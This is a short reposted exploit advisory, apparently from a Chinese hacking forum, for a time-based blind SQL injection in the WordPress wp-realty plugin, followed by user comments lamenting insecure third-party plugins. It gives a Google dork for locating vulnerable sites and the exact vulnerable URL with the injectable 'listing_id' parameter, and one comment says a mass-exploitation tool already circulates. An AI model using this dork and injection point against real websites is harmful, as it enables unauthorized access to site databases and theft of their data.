WordPress WP Realty Blind SQL Injection
$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: [url]http://wprealty.org/[/url]
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
Credits to: Greek Hacking Scene
评论10次
哎,这次WORDPRESS都不敢用第三方插件了
第三方其实很蛋疼~
装WP都不敢用插件或者其他的主题了。。
呵呵。。。貌似很少用的插件。。。
支持一下QQQQQQQQQQQQQQQQQQQQ、
感谢分享。
第三方插件
第三方插件
目测又是插件,,现在的开发者,哎,wp的一世英明毁于一旦
沙发,WordPress批量已经出来了,前天见到的